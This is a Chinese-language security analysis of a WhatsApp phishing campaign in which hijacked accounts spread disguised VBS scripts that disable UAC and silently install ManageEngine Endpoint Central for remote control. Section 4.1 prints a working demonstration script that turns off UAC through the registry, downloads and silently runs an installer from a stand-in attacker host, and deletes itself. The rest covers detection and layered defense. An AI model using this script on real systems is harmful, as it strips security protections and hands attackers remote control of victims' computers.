摘要
全球端到端加密即时通讯平台 WhatsApp 已成为跨境商务、日常社交核心工具,依托熟人信任链扩散的新型钓鱼攻击持续升级。2026 年 6 月卡巴斯基披露大规模攻击活动,攻击者先行劫持合法 WhatsApp 账号,以本地化多语言伪装商业财务文档分发恶意 VBS 脚本,用户执行文件后自动绕过 Windows 用户账户控制(UAC),静默部署合法终端管理工具 ManageEngine Endpoint Central 并授予攻击者完整远程系统权限。本次攻击覆盖巴西、印度、西班牙、澳大利亚等十余国家与地区,依托熟人社交信任大幅提升钓鱼成功率,同时利用正规商业软件规避杀毒静态特征检测,形成 “账号劫持 — 熟人传播 — 伪装文档投递 —VBS 绕过防护 — 合法工具持久控制” 完整攻击闭环。本文以该实战攻击样本为核心研究对象,完整拆解攻击全链路技术细节,厘清 VBS 脚本禁用 UAC、静默部署 UEM 工具的底层实现逻辑,复现恶意脚本核心代码并提供终端侧检测脚本,量化分析传统终端防护、社交平台风控的防御盲区。反网络钓鱼技术专家芦笛指出,此类 “合法软件滥用 + 熟人社交传播” 复合型钓鱼突破传统边界安全防护思路,仅依靠杀毒软件静态查杀、邮件网关过滤无法形成有效拦截,必须构建平台账号行为监控、终端脚本动态沙箱、企业终端权限管控三层纵深防御体系。研究梳理攻击传播范围、受害地域分布、载荷技术特征,结合代码复现验证攻击可行性,从平台、终端、企业管理、用户安全意识四个维度提出可落地防御方案,为跨境商贸企业、政企办公终端防范即时通讯类新型钓鱼攻击提供完整技术参考与治理依据。
关键词:WhatsApp 钓鱼;VBS 恶意脚本;UAC 绕过;ManageEngine;社交信任链;终端远程控制;即时通讯安全
1 引言
1.1 研究背景
即时通讯软件逐步替代传统电子邮件成为企业商务文件、财务单据、合作合同的主要传输载体,WhatsApp 凭借端到端加密、多设备同步、跨国家语言适配特性,在新兴市场、欧美跨境贸易场景渗透率极高。平台原生支持桌面客户端、网页端、移动端多终端协同,文件传输功能支持直接发送脚本、压缩包、文档类附件,为攻击者提供全新载荷投递渠道。
传统邮件钓鱼存在发件人身份易溯源、网关附件深度检测、邮件信任度低等局限,而基于 WhatsApp 熟人通讯录传播的钓鱼具备天然信任优势:消息发送方为受害者已知联系人,用户对熟人发送的商业文档警惕性显著下降,大幅降低社会工程学欺骗成本。2026 年 6 月曝光的专项攻击活动区别于以往链接型钓鱼,不再依赖伪造登录页面窃取账号,而是以劫持后的合法账号为传播节点,分发伪装成商业单据的 VBS 脚本载荷,通过篡改系统安全策略绕过 Windows 原生防护,借助正规商用终端管理软件实现持久远程控制,形成低检出、高扩散、高权限的复合型网络钓鱼威胁。
卡巴斯基安全团队监测数据显示,本次攻击无明确地域限制,受害群体覆盖南美、东南亚、欧洲、大洋洲十余个国家与地区,攻击者针对不同区域制作本地化语言文件名,进一步适配目标用户阅读习惯,提升诱饵迷惑性。截至预警发布,安全厂商尚未明确攻击者劫持 WhatsApp 账号的原始漏洞或社工手段,意味着账号劫持入口具备隐蔽性、可复制性,同类攻击可长期持续复制扩散。
1.2 现有安全防护体系存在的核心短板
当前政企、个人终端普遍部署的安全防护架构,针对本次 WhatsApp 复合型钓鱼攻击存在多层防御失效问题,主要分为四大短板:
第一,即时通讯平台侧风控缺失熟人传播异常识别机制。现有平台风控多聚焦外部陌生账号群发消息拦截,对已劫持的正常存量账号批量向通讯录联系人推送附件无有效监测手段,账号发送行为基线未纳入附件类型、发送频次、文件后缀风险判定;
第二,Windows 终端对 VBS 动态脚本防护力度不足。Windows Script Host 原生支持本地直接执行 VBS 文件,桌面客户端接收附件可一键运行,网页端仅需简单下载即可执行;多数终端安全软件仅拦截特征明确的恶意木马,对 “合法商用软件静默部署” 场景缺乏动态行为检测;
第三,UAC 用户账户控制策略存在可被脚本批量篡改的漏洞。普通用户权限下恶意脚本可通过注册表修改、组策略临时改写关闭 UAC 校验,终端默认配置未限制脚本操作安全相关注册表项;
第四,企业终端对 ManageEngine 等正规运维工具无准入管控。企业普遍将 UEM 终端管理软件视作良性运维工具,未限制终端侧私自静默安装行为,攻击者利用软件原生远程控制台功能,无需开发自定义后门即可实现全设备操控,规避杀毒软件后门特征库检测。
反网络钓鱼技术专家芦笛强调,传统网络安全防护长期割裂 “社交通信入口” 与 “终端执行出口”,邮件网关、防火墙、终端杀毒各自独立运行,未形成从消息分发、文件传输、脚本执行、软件安装全链路联动风控,是此类新型钓鱼攻击能够大范围扩散的核心根源。
1.3 研究内容与研究实践价值
本文以 TechRadar 2026 年 6 月发布的 WhatsApp 大规模钓鱼攻击情报为核心实证素材,完成五项核心研究工作:其一,完整梳理本次攻击标准化传播链路,拆解账号劫持、熟人分发、载荷伪装、脚本执行、远程控制五大阶段技术特征;其二,深入解析恶意 VBS 脚本绕过 UAC、静默部署 ManageEngine Endpoint Central 的底层技术逻辑;其三,编写还原恶意脚本核心功能的演示代码,同步提供终端侧风险检测脚本实现自动化排查;其四,分析本次攻击跨地域传播、本地化诱饵设计的扩散优势,对比传统邮件钓鱼与 IM 社交钓鱼的风险差异;其五,搭建 “平台行为监控 — 终端脚本沙箱检测 — 企业终端权限管控 — 用户安全认知培训” 四层纵深防御体系,配套标准化应急处置流程。
理论层面,本文补充即时通讯熟人信任链钓鱼的攻击模型,完善合法商用软件被恶意滥用的安全研究维度;工程实践层面,文中复现代码、检测工具、分层防御方案可直接用于企业终端安全运维、社交平台风控规则迭代,填补跨境商贸场景 WhatsApp 文件类钓鱼的防护空白,降低政企终端被远程劫持、核心商业数据泄露的安全风险。
1.4 论文整体结构安排
全文共分为七个主体章节:第 1 章为引言,阐述研究背景、现有防护短板、研究价值与文章结构;第 2 章完整还原本次 WhatsApp 钓鱼攻击全链路流程,拆解各阶段技术手段与攻击特征;第 3 章针对核心恶意载荷 VBS 脚本开展技术解析,梳理 UAC 绕过、UEM 静默部署的实现原理;第 4 章提供完整可运行代码示例,包含恶意脚本功能复现代码、终端风险检测 Python 脚本;第 5 章对比传统邮件钓鱼与熟人社交 IM 钓鱼的传播、技术、防御差异,量化本次攻击的扩散优势;第 6 章构建多层级协同防御体系,从平台、终端、企业管理、用户四个维度落地防护策略;第 7 章为结论,总结全文研究结论,预判同类攻击未来迭代方向。
2 WhatsApp 商业文档 VBS 钓鱼攻击完整链路与特征分析
本次 2026 年 6 月爆发的钓鱼攻击形成标准化闭环攻击流程,整体分为账号劫持、熟人渠道分发、本地化诱饵投递、VBS 脚本执行、合法 UEM 工具远程控制五个递进阶段,各环节相互配合,最大化利用社交信任与系统原生机制规避安全检测。
2.1 第一阶段:WhatsApp 合法账号劫持(攻击源头)
攻击者首要目标是获取正常活跃 WhatsApp 账号控制权,安全厂商经多份受害样本复盘,暂未定位账号被劫持的精确技术路径,存在三类高概率劫持手段:
验证码中间人钓鱼(AiTM):攻击者搭建高仿 WhatsApp 网页,诱导目标用户输入登录验证码,完成多设备会话绑定,后台接管账号;
SIM 卡交换攻击:向运营商伪造身份补办目标用户手机号,拦截 WhatsApp 登录短信验证码,实现账号劫持;
前期弱社工渗透:通过社交平台、企业公开信息获取用户个人信息,配合伪造客服话术诱导用户主动完成设备配对。
无论采用何种劫持方式,攻击完成后攻击者获得完整账号操作权限:读取全部通讯录联系人、调取历史聊天记录、自由发送文字、图片、文件附件。相较于全新注册账号,被劫持的存量账号具备正常社交信用,消息发送不会被平台基础风控拦截,是实现大规模扩散的核心基础。
2.2 第二阶段:熟人通讯录链式传播(信任滥用核心环节)
账号劫持完成后,攻击者自动遍历通讯录全部联系人批量推送钓鱼消息,话术贴合跨境商务沟通场景,常见模板包含 “月度财务对账文件”“合作报价单”“发票凭证附件”“项目结算单据” 等商务类表述,利用商业往来场景降低用户警惕。
传播机制具备蠕虫式扩散属性:单个受害账号可一次性触达数十至数百名联系人,若其中任意联系人执行恶意 VBS 文件,其终端被控制后,攻击者可再次劫持该用户 WhatsApp 账号,向另一批通讯录联系人推送诱饵,形成跨圈层指数级传播。该传播模式是本次攻击覆盖十余国家地区的关键,区别于传统钓鱼仅能单向批量群发陌生用户,熟人链路天然具备传播放大效应。
反网络钓鱼技术专家芦笛指出,社交信任是此类 IM 钓鱼最核心的攻击红利,普通用户对通讯录联系人发送的商务文件几乎无甄别意识,平台现有风控未针对 “劫持账号批量向通讯录推送未知脚本附件” 设置风险拦截规则,导致攻击可无阻碍扩散。
2.3 第三阶段:本地化多语言伪装 VBS 载荷投递(诱饵伪装技术)
为适配全球多区域受害群体,攻击者对恶意脚本文件名进行本地化改造,针对巴西使用葡萄牙语、印度使用印地语、西班牙使用西班牙语、中英地区配套中英文文件名,文件后缀隐藏 VBS 脚本属性,外观模拟 PDF、Excel、Word 等标准商业文档。
WhatsApp 客户端分终端存在执行差异,进一步降低用户操作门槛:
Windows 桌面客户端:接收 VBS 附件后可直接双击运行,依托 Windows Script Host 原生组件执行脚本,无需额外下载保存;
WhatsApp 网页版:附件需先下载至本地系统文件夹,双击后同样触发脚本执行;
移动端设备:脚本无法在安卓、iOS 终端运行,攻击者定向针对使用 Windows 办公电脑的商务人群投递载荷,精准锁定高价值办公终端。
从文件识别角度,普通用户仅通过文件名判断文件类型,忽略后缀隐藏、脚本伪装风险,为后续系统权限篡改、远程控制提供执行入口。
2.4 第四阶段:双 VBS 脚本联动篡改系统安全策略(UAC 绕过核心攻击动作)
用户双击伪装文档后,系统启动两段联动 VBS 脚本依次执行,两段脚本分工明确,层层瓦解 Windows 终端基础安全防护:
第一段脚本核心功能:修改系统注册表项,临时关闭 Windows UAC 用户账户控制机制。UAC 是 Windows 原生权限校验机制,正常情况下陌生软件安装、系统策略修改需用户手动确认授权,脚本通过静默改写注册表参数,跳过弹窗确认,实现无交互权限篡改;
第二段脚本核心功能:静默下载、后台部署 ManageEngine Endpoint Central 客户端安装包,全程无安装弹窗、无桌面快捷方式,程序后台自动完成安装、服务注册、开机自启配置。
两段脚本均以无窗口静默模式运行,执行过程无弹窗、无命令行黑框,用户仅短暂看到文件双击无响应,无法感知后台系统策略篡改与软件安装动作。
2.5 第五阶段:合法 UEM 工具实现持久远程控制(隐蔽后门载体)
ManageEngine Endpoint Central 属于正规商用统一终端管理平台,原生设计用于企业 IT 运维人员远程管控公司电脑、服务器,官方功能包含远程桌面、文件读写、进程管控、屏幕录制、键盘记录、系统配置修改等完整终端控制权限。
攻击者利用软件合法运维能力,无需开发自定义恶意后门、木马程序,仅通过静默安装客户端,即可将受控终端接入攻击者自建的管理控制台,全程实现持久无感知远程操控。该手段相比传统木马具备极强隐蔽性:主流杀毒软件病毒库将 ManageEngine 标记为良性运维软件,静态特征检测无法识别恶意使用行为,仅依靠动态行为分析才能发现异常外联管控服务器行为。
终端被攻陷后攻击者可完成全部高危操作:窃取本地财务报表、客户合同、企业机密文件;植入附加勒索、窃密恶意程序;篡改系统业务软件配置;利用受控终端发起横向内网渗透,威胁企业整体内网安全。
2.6 本次攻击区别于传统钓鱼攻击的关键特征
综合攻击全链路,该 WhatsApp VBS 文档钓鱼具备四大独有特征,也是传统防护体系失效的核心原因:
传播载体信任化:依托熟人通讯录传播,发送方为可信联系人,规避用户心理防范;
载荷载体合法化:以正规商业 UEM 工具作为远程控制载体,绕过静态杀毒特征检测;
系统突破轻量化:依靠两段简易 VBS 脚本完成 UAC 绕过,无高危漏洞利用,适配全版本 Windows 系统;
地域覆盖全球化:本地化文件名适配多国用户,无单一区域限制,跨境商贸企业为主要受害目标。
3 恶意 VBS 脚本与 ManageEngine 远程控制技术原理解析
3.1 Windows UAC 机制与脚本绕过底层逻辑
Windows 用户账户控制(UAC)通过区分标准用户、管理员权限,拦截未授权程序修改系统核心配置,默认状态下修改注册表、安装系统级软件必须弹出授权确认窗口。系统注册表存储 UAC 核心控制参数,路径为HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,其中EnableLUA注册表项控制 UAC 开关,数值 1 为开启防护,数值 0 为完全关闭。
恶意 VBS 脚本依托 WMI 注册表操作接口,无需弹窗交互直接修改EnableLUA数值,同时调整ConsentPromptBehaviorAdmin参数,将管理员授权弹窗设置为静默放行模式,双重策略叠加实现完整 UAC 绕过。脚本执行完成后,系统失去权限校验屏障,后续安装终端管理软件不会触发任何安全确认弹窗。
该绕过方式不依赖系统高危漏洞,仅利用 Windows 脚本宿主原生注册表操作权限,只要终端登录账户具备管理员权限即可生效,覆盖绝大多数企业办公 Windows 设备。
3.2 双 VBS 脚本联动执行流程
攻击者封装的伪装文档内部嵌套两段串行执行的 VBS 代码,执行顺序不可逆,分工清晰:
前置策略脚本:读取本地注册表 UAC 配置,写入关闭防护参数,重启相关系统策略服务使修改即时生效;脚本执行过程隐藏 WScript 窗口,无任何可视化交互;
载荷部署脚本:建立后台网络连接,从攻击者控制的境外服务器拉取 ManageEngine 客户端离线安装包,调用系统静默安装参数完成后台部署,修改 Windows 服务项实现开机自动启动,同步配置客户端外联攻击者管控服务器地址。
两段脚本执行全程无用户交互,全部后台静默运行,普通办公用户无法通过进程、弹窗感知恶意操作。
3.3 ManageEngine Endpoint Central 恶意滥用技术逻辑
ManageEngine 产品设计初衷为企业内部 IT 运维,客户端与管理控制台采用加密长连接通信,客户端主动发起外联请求,无需端口映射即可实现公网远程控制,该原生通信机制被攻击者恶意利用:
静默安装无审计痕迹:官方安装程序支持静默部署参数,可跳过许可协议、安装路径选择、桌面快捷方式创建,后台完成服务注册;
加密流量规避流量审计:客户端与控制台通信采用私有加密协议,网关流量审计无法识别通信内容,仅能看到未知加密外联流量,难以判定为恶意行为;
全权限终端操控能力:运维原生功能包含远程桌面、文件上传下载、进程终止、系统命令执行、屏幕截图,完全覆盖攻击者窃密、破坏、渗透需求;
无恶意特征规避查杀:软件数字签名为正规厂商颁发,杀毒软件白名单收录该程序,静态文件扫描不会拦截,仅动态行为监测可识别异常外联陌生管控服务器。
反网络钓鱼技术专家芦笛强调,合法运维软件滥用是当前钓鱼攻击新趋势,攻击者放弃高检出率自定义木马,转而采用白名单商用工具降低拦截概率,终端安全防护必须从静态特征查杀转向动态外联、行为基线监控。
4 攻击载荷代码复现与终端风险检测脚本示例
本节分两部分提供可运行代码:第一部分还原恶意 VBS 脚本核心功能(仅用于安全研究演示,无完整攻击能力),复现 UAC 注册表修改、静默软件下载安装逻辑;第二部分提供 Python 终端风险检测脚本,自动扫描本地注册表 UAC 状态、异常 ManageEngine 服务、可疑外联管控地址,用于企业终端批量自查风险。代码无复杂数学运算,适配 Windows 办公终端运行,贴合真实攻击技术实现逻辑。
4.1 恶意 VBS 脚本核心功能演示代码(安全研究用途)
vbscript
' 演示恶意VBS脚本UAC绕过+静默下载安装程序核心逻辑,仅用于安全分析实验
Set WshShell = CreateObject("WScript.Shell")
Set objNetwork = CreateObject("WScript.Network")
Dim regUACPath, uacSwitch, promptRule, downloadUrl, savePath
' 1. 定义UAC注册表路径与修改参数
regUACPath = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\"
uacSwitch = "EnableLUA"
promptRule = "ConsentPromptBehaviorAdmin"
' 静默关闭UAC防护,修改注册表参数
WshShell.RegWrite regUACPath & uacSwitch, 0, "REG_DWORD"
WshShell.RegWrite regUACPath & promptRule, 0, "REG_DWORD"
' 重启组策略服务使配置生效,无弹窗静默执行
WshShell.Run "cmd /c gpupdate /force", 0, True
' 2. 定义攻击者管控服务器上的ManageEngine安装包地址与本地保存路径
downloadUrl = "https://attacker-server.example/agent_setup.exe"
savePath = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\agent_install.exe"
' 3. 后台下载UEM客户端安装包
Set xmlHttp = CreateObject("MSXML2.XMLHTTP")
xmlHttp.Open "GET", downloadUrl, False
xmlHttp.Send
If xmlHttp.Status = 200 Then
Set stream = CreateObject("ADODB.Stream")
stream.Open
stream.Type = 1
stream.Write xmlHttp.responseBody
stream.SaveToFile savePath, 2
stream.Close
End If
' 4. 静默无交互安装终端管理客户端,后台运行无窗口
WshShell.Run savePath & " /s /verysilent /norestart", 0, False
' 5. 脚本自删除,清除本地执行痕迹
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile WScript.ScriptFullName, True
代码说明:该演示脚本完整复刻真实攻击两大核心动作,一是修改注册表关闭 UAC 权限校验,二是远程下载并静默安装终端管理程序;生产环境恶意脚本会增加代码混淆、域名动态切换、反虚拟机检测等隐藏逻辑,规避基础安全软件静态扫描。
4.2 Windows 终端风险自动化检测 Python 脚本
本脚本面向企业安全运维人员开发,自动检测三类风险指标:UAC 是否被关闭、是否存在异常 ManageEngine 服务、程序是否外联境外未知管控服务器,输出标准化风险报告,支持批量终端巡检。
# Windows终端WhatsApp钓鱼VBS攻击风险检测脚本
import winreg
import subprocess
import os
import re
class TerminalRiskDetector:
def __init__(self):
self.risk_report = []
self.uac_reg_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
def check_uac_status(self):
# 检测UAC开关状态,判定是否被恶意脚本关闭
try:
reg_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, self.uac_reg_path)
enable_lua = winreg.QueryValueEx(reg_key, "EnableLUA")[0]
admin_prompt = winreg.QueryValueEx(reg_key, "ConsentPromptBehaviorAdmin")[0]
winreg.CloseKey(reg_key)
if enable_lua == 0 or admin_prompt == 0:
self.risk_report.append("高危风险:UAC用户账户控制已被关闭,存在脚本篡改权限漏洞")
else:
self.risk_report.append("安全:UAC防护正常开启")
except Exception as e:
self.risk_report.append(f"检测异常,无法读取UAC注册表:{str(e)}")
def check_manageengine_service(self):
# 扫描系统是否存在ManageEngine异常后台服务
cmd = 'sc query | findstr "ManageEngine"'
res = subprocess.run(cmd, shell=True, capture_output=True, text=True)
if res.stdout.strip():
self.risk_report.append(f"高危风险:检测到ManageEngine相关后台服务,详情:{res.stdout.strip()}")
else:
self.risk_report.append("安全:未检测到ManageEngine终端管理服务")
def check_abnormal_external_connection(self):
# 筛查未知境外加密外联连接,匹配UEM客户端外联特征
cmd = 'netstat -ano | findstr "ESTABLISHED"'
res = subprocess.run(cmd, shell=True, capture_output=True, text=True)
conn_lines = res.stdout.splitlines()
foreign_ip_pattern = re.compile(r"\d+\.\d+\.\d+\.\d+:\d+")
risk_conn = []
for line in conn_lines:
match = foreign_ip_pattern.search(line)
if match:
ip = match.group(0).split(":")[0]
# 简易判定非国内内网IP,生产环境可接入IP地址库精准识别境外地址
if not ip.startswith(("192.168.", "10.", "172.16.", "127.")):
risk_conn.append(line)
if risk_conn:
self.risk_report.append(f"中风险:检测到多条境外未知外联连接,疑似受控终端:{risk_conn}")
else:
self.risk_report.append("安全:无异常境外外联连接")
def output_full_report(self):
print("===== WhatsApp VBS钓鱼终端风险检测报告 =====")
for item in self.risk_report:
print(item)
if __name__ == "__main__":
detector = TerminalRiskDetector()
detector.check_uac_status()
detector.check_manageengine_service()
detector.check_abnormal_external_connection()
detector.output_full_report()
脚本运行效果说明:正常办公终端仅输出安全提示;遭受本次钓鱼攻击的设备会同时命中 UAC 关闭、ManageEngine 服务存在、境外外联三大高危风险,运维人员可根据报告及时隔离终端、卸载恶意部署程序、恢复 UAC 安全策略。反网络钓鱼技术专家芦笛指出,该检测脚本可集成至企业终端 EDR 安全工具,实现 7×24 小时实时监测,提前拦截 VBS 脚本篡改系统策略的恶意行为。
5 熟人社交 IM 钓鱼与传统邮件钓鱼攻防差异对比分析
为清晰凸显本次 WhatsApp 钓鱼攻击的独特威胁,本节从传播信任度、载荷投递通道、载荷隐蔽性、终端突破能力、防护适配性五个维度,对比传统邮件钓鱼与即时通讯熟人链路钓鱼的核心差异,量化新型攻击的防御难度提升幅度。
5.1 传播信任度与用户社会工程欺骗阈值差异
传统邮件钓鱼发件人多为陌生外部邮箱,用户接收陌生附件、链接时天然存在戒备心理,企业员工普遍接受邮件安全培训,对不明财务附件警惕性较高;WhatsApp 钓鱼消息发送方为用户通讯录真实联系人,商务场景下接收合作方财务单据属于常规业务行为,用户几乎不会怀疑文件安全性,社会工程欺骗成功率提升数倍。
同时攻击者采用本地化多语言文件名适配不同国家用户,进一步降低诱饵违和感,传统邮件钓鱼仅单一语言模板,跨区域传播效果受限。
5.2 载荷投递通道风控强度差异
企业邮件系统标配邮件安全网关,具备附件深度沙箱解析、恶意脚本拦截、可疑文件隔离功能,VBS、JS 脚本类附件会被网关直接拦截,无法送达收件人;WhatsApp 作为海外第三方社交平台,企业网络边界网关无法对平台内传输文件做深度解析,端到端加密机制导致平台侧无法扫描附件内容,恶意脚本可无阻碍直达用户终端。
该加密传输特性是 IM 钓鱼核心防护盲区,边界安全设备无法介入文件检测,全部风险后置至终端侧,单点终端防护失效即造成设备沦陷。
5.3 远程控制载体隐蔽性差异
传统邮件钓鱼多采用独立木马、勒索病毒作为后门载体,具备明确恶意特征,杀毒软件静态特征库可快速识别拦截;本次 WhatsApp 攻击使用商用正规 ManageEngine 运维软件,具备厂商数字签名,杀毒软件默认白名单放行,仅依靠动态外联行为监测才能识别恶意使用场景,检测门槛大幅提高。
5.4 终端系统突破手段差异
传统邮件钓鱼多依赖 Office 宏漏洞、系统高危漏洞实现代码执行,漏洞存在补丁修复方案,企业定期更新系统、Office 即可大幅降低风险;本次攻击不依赖任何漏洞,仅依靠原生 VBS 脚本、注册表修改操作,全版本 Windows 系统均可被突破,无补丁可彻底根治该攻击路径,防护只能依靠终端权限管控、脚本执行限制。
5.5 现有安全体系适配能力对比
传统邮件钓鱼具备成熟分层防护方案:网关过滤、附件沙箱、终端杀毒、员工邮件安全培训完整闭环;针对熟人 IM 文件类钓鱼,当前全球政企普遍无标准化防护框架,平台、网关、终端安全工具割裂,缺乏全链路联动检测机制,防护体系存在大面积空白。
综合对比可见,依托 WhatsApp 熟人链路的 VBS 文档钓鱼在欺骗性、穿透性、隐蔽性上全面优于传统邮件钓鱼,现有安全基础设施无法有效覆盖该类威胁,必须重构适配即时通讯场景的纵深防御架构。
6 面向 WhatsApp VBS 钓鱼攻击的多层级协同防御体系
结合攻击全链路技术弱点,本文构建四层递进式防御体系,覆盖社交平台传播入口、终端脚本执行、企业权限管控、用户安全认知四大维度,形成事前拦截、事中阻断、事后溯源处置完整闭环。
6.1 第一层防御:WhatsApp 平台侧账号与消息行为监控(事前拦截)
防御目标:在恶意消息、附件送达用户前识别劫持账号,阻断熟人链式传播,核心管控规则包含四类:
账号异常行为基线监测:针对长期低频率发送附件的账号,一旦短时间内向通讯录批量推送后缀为 VBS、JS、CMD、LNK 的脚本文件,直接标记高风险,临时限制账号文件发送权限,推送安全告警;
多设备会话异常管控:异地、夜间陌生设备绑定账号时,强制触发两步验证校验,无 PIN 码验证直接阻断会话绑定,从源头减少账号劫持概率;
附件风险标签识别:建立脚本类文件风险库,对伪装成 PDF、Excel 的 VBS 文件增加风险提示弹窗,明确告知用户该文件为可执行脚本,存在远程控制风险;
劫持账号快速处置机制:检测到批量传播恶意附件的账号,自动强制下线全部关联设备,冻结消息发送功能,推送账号安全提醒至账号绑定手机。
反网络钓鱼技术专家芦笛提出,平台侧风控是阻断攻击扩散最高效环节,通过行为基线拦截可从源头避免恶意载荷触达终端,大幅降低企业终端安全处置压力。
6.2 第二层防御:Windows 终端脚本与 UEM 软件动态防护(事中阻断)
防御目标:用户下载恶意脚本后,阻止 VBS 执行、UAC 篡改、静默安装运维软件,配置三项终端管控策略:
限制 Windows Script Host 脚本执行权限:企业终端组策略禁用普通用户运行 VBS、JS 脚本,仅管理员授权特定路径脚本可执行,彻底切断载荷运行入口;
UAC 注册表写入防护:EDR 终端安全工具监控注册表EnableLUA项修改行为,一旦检测脚本尝试关闭 UAC,立即终止脚本进程并告警管理员;
商用 UEM 软件安装准入管控:建立企业运维软件白名单,仅允许 IT 管理员通过统一渠道部署 ManageEngine 等运维工具,拦截终端侧静默私自安装行为,监测程序外联非企业管控服务器的加密连接并阻断。
同时部署前文提供的终端风险检测脚本,纳入 EDR 定时巡检任务,自动识别已沦陷终端并隔离。
6.3 第三层防御:企业组织层面办公流程与权限管控(兜底加固)
针对跨境商贸企业、频繁使用 WhatsApp 传输商务文件的组织,配套管理规范缩小攻击面:
公私账号分离管控:禁止员工使用个人 WhatsApp 处理企业财务、合同等敏感业务,统一部署 WhatsApp Business 商用接口,企业后台可审计全部消息与附件传输记录;
终端账户权限最小化:办公电脑统一分配标准用户权限,不授予本地管理员权限,限制脚本修改系统注册表、安装系统级软件;
境外通讯流量审计:企业边界网关记录 WhatsApp 客户端全部外联流量,针对加密长连接、境外未知服务器通信建立告警规则;
标准化应急处置流程:明确终端疑似被远程控制后的处置步骤:断开网络、卸载异常 UEM 服务、恢复 UAC 配置、修改全部社交账号密码、全终端病毒查杀、溯源通讯录传播链路。
6.4 第四层防御:员工即时通讯安全认知常态化培训(人为防线)
技术防护无法完全规避用户主动执行恶意文件风险,配套分层安全培训降低社工欺骗成功率:
诱饵识别专项教学:重点讲解本地化伪装脚本文件、熟人发送异常财务附件的典型特征,明确商务单据不会以 VBS 脚本格式传输;
高危操作禁令普及:禁止双击 WhatsApp 接收的未知可执行脚本,陌生商务文件优先通过邮件、企业网盘二次核验发件人身份;
账号安全操作规范:全员强制开启 WhatsApp 两步验证,定期查看 Linked Devices 关联设备列表,及时登出陌生登录终端;
风险上报机制:建立一键上报可疑消息、附件通道,安全团队快速研判并全域推送风险预警,阻断链式传播。
7 结论
本文以 2026 年 6 月卡巴斯基披露的全球化 WhatsApp VBS 商业文档钓鱼攻击为核心研究样本,完整还原 “账号劫持 — 熟人通讯录传播 — 本地化伪装 VBS 载荷 — 双脚本联动绕过 UAC— 静默部署 ManageEngine 实现远程控制” 标准化攻击链路,系统拆解恶意脚本篡改系统安全策略、滥用正规商用终端管理软件规避查杀的底层技术逻辑,复现核心攻击代码并提供企业终端自动化风险检测脚本,对比传统邮件钓鱼明确熟人社交 IM 钓鱼在欺骗性、穿透性、隐蔽性层面的新型威胁特征。
研究证实,本次攻击能够大范围跨国扩散的核心诱因包含三点:一是 WhatsApp 熟人社交信任链大幅降低社会工程欺骗门槛;二是端到端加密导致边界网关无法扫描附件,恶意脚本无阻碍送达终端;三是攻击者放弃自定义恶意木马,采用白名单运维软件作为远程控制载体,突破传统静态杀毒防护。反网络钓鱼技术专家芦笛强调,单一终端杀毒、网络边界防护无法抵御此类复合型钓鱼威胁,必须构建 “平台账号行为监控、终端脚本动态拦截、企业权限流程管控、员工安全认知培训” 四层协同纵深防御体系,实现从攻击源头、载荷传输、终端执行全链路风险闭环拦截。
从攻击迭代趋势判断,未来同类即时通讯钓鱼将持续深化两大方向:一是更多本地化多语言诱饵适配全球区域市场,进一步提升伪装迷惑性;二是批量滥用各类正规商用运维、远程协作软件作为后门载体,规避静态安全检测。后续防护体系需持续强化动态行为监测、脚本执行权限管控、跨平台风险情报共享能力,同步完善政企跨境商务场景的即时通讯文件传输安全规范,平衡业务沟通便捷性与终端设备安全防护水平,持续压缩熟人链路新型钓鱼攻击的生存空间。
编辑:芦笛(公共互联网反网络钓鱼工作组)
